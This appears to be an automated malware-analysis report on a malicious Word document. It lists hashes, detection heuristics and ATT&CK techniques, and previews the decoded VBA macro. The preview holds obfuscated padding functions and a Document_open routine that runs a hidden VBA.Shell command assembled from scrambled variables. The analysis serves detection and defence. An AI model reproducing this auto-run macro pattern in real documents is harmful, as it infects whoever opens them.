Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 75f146639bc27609…

MALICIOUS

Office (OLE)

175.9 KB Created: 2018-07-23 13:37:00 Authoring application: Microsoft Office Word First seen: 2019-01-20
MD5: ac62aba5c2a78d092c14159fdde447d6 SHA-1: 2b02c94d77deda08e17586838cfa28a2cf1f33b8 SHA-256: 75f146639bc276090d18a2fb53913e06d5dd6583f786f58f5e0229a6e8b79b86
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA code, which is commonly used to execute arbitrary commands or download and run additional payloads. The 'Document_Open' macro further suggests that this malicious code is designed to execute automatically upon opening the document. While no specific URLs or executable payloads were directly extracted, the presence of these indicators strongly suggests a downloader or dropper functionality.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6989445-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6989445-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25218 bytes
SHA-256: 036e8c13853aaeb244d069d2469e893be2ee1a95ebe67fa07a23d0df844c8a44
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "hzqoUrQTfEOO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function rjDMdTWbjwIsI()
On Error Resume Next
   If PoXtj Xor zVwMz Then
      zTTfz = 134100329
   End If
   If djYPSS Xor aftIUZ Then
      zXJji = 134100329
   End If
   If SPczw Xor hWjlb Then
      OsXiT = 134100329
   End If
   If rKHzjz Xor IPRLV Then
      qbrYF = 134100329
   End If
   If lUbnsX Xor zvJwPW Then
      lVQQl = 134100329
   End If
End Function
Private Function ZDNfTBnRmYIi()
On Error Resume Next
   If qSQqjc Xor zpjSW Then
      SbFEV = 134100329
   End If
   If aNdMw Xor UphTmT Then
      YzvFXF = 134100329
   End If
   If GSdnq Xor JiOcfK Then
      qdszW = 134100329
   End If
   If iMDTLo Xor JzkEjV Then
      TvAZF = 134100329
   End If
   If QrWKSi Xor UtXGfj Then
      Itqcp = 134100329
   End If
End Function
Private Function ZNGSwzA()
On Error Resume Next
   If qukql Xor jlfvOK Then
      MzLGS = 134100329
   End If
   If aIUFM Xor EzqtN Then
      dOYXH = 134100329
   End If
   If OnwIb Xor wFJKB Then
      IbRGcH = 134100329
   End If
   If lCGcPM Xor fkwcc Then
      RnLXu = 134100329
   End If
   If ZSjdO Xor jwwhvo Then
      dqSdAs = 134100329
   End If
   If Nvopu Xor oMIvP Then
      FzvDT = 134100329
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If fAtJvq = PNFHCq Then
      VWXIAw = ITSti * 102768365
   End If
   If pMbksN = pjUwi Then
      Alajw = HorPAI * 102768365
   End If
   If zopTU = YcEDuu Then
      LYlwbo = lmwcL * 102768365
   End If
   If jwjjk = hiTPk Then
      Ajwjt = rTHjP * 102768365
   End If
VBA.Shell "" + hbQRFPaAiW + pjqCJRbMXsm + CVar("C") + drzwabQriIFDhd + kwJlESIBNrr + BonnVRGw + tWEtX + uZruUPj + dYNsMHc + fUTKiDjEVNPnr, 0
   If DNTYE = jVUhlJ Then
      bDdjj = SLZEMP * 102768365
   End If
   If udIGI = UmUUSz Then
      KmDpf = BTLbb * 102768365
   End If
   If uAAPml = pznEM Then
      wzwcst = dSkfE * 102768365
   End If
End Sub
Private Function BcPUKmRL()
On Error Resume Next
   If ZGthW = rFpzY Then
      WiAwY = XknzjA * 102768365
   End If
   If hvjUMf = KtVErO Then
      zhzAjB = mmSTKF * 102768365
   End If
   If kiiYqW = EOaWj Then
      GUOun = tNhFj * 102768365
   End If
   If uIQBC = dCfNFQ Then
      mQtQs = DPMmL * 102768365
   End If
   If NHwaN = jnhHj Then
      RaAGKN = VdoQc * 102768365
   End If
End Function
Private Function SanpbjzMTYiN()
On Error Resume Next
   If iWsCa = ZmaUAj Then
      GjWZu = cMlqiD * 102768365
   End If
   If KiscXq = HJujq Then
      mbXcJ = wwMAcT * 102768365
   End If
   If bbFpj = HYhzkv Then
      TiFrD = ukFqZ * 102768365
   End If
   If jwiQIp = wGYpz Then
      vHtWYQ = VnvHS * 102768365
   End If
   If LBlFjz = fhAEt Then
      aLQtJ = fMkwwZ * 102768365
   End If
End Function
Private Function QjDZuASz()
On Error Resume Next
   If ildsRJ = nfRmoR Then
      OnYUKo = okqQtj * 102768365
   End If
   If jDRoz = UqnQS Then
      QIPMol = WsQXvb * 102768365
   End If
   If PvuXPF = cFkiJ Then
      TzwXK = mijcT * 102768365
   End If
   If TPjVNd = vMjLhA Then
      QdFszv = hmoED * 102768365
   End If
   If ZdGElr = slGvnj Then
      KdjrX = uKiMh * 102768365
   End If
End Function


Attribute VB_Name = "RWkfRXKkffYmW"
Private Function nESfuLiw()
On Error Resume Next
   If cEJaZz = Wmdstw Then
      For vIhnTc = 155 To 516331127
         nAHOY = 21658 + uEDztO / (46281 * DsjdwS * 67395 * FuqfQ)
      Next
      Else
      TtHBr = (DCLAml / hasAkS)
   End If
   If qQHTPD = vkNlu Then
      For EjONfj = 155 To 516331127
         pfiAK = 38586 + CJEloB / (45648 * OAWOZL * 56615 * zwlzN)
      Next
      Else
      XVXKO = (KmHIvH / mjbws)
   End If
   If iMzCM = DHmMB Then
      For wjEqJ = 155 To 516331127
         SAqXC = 31756 + koKVD 
... (truncated)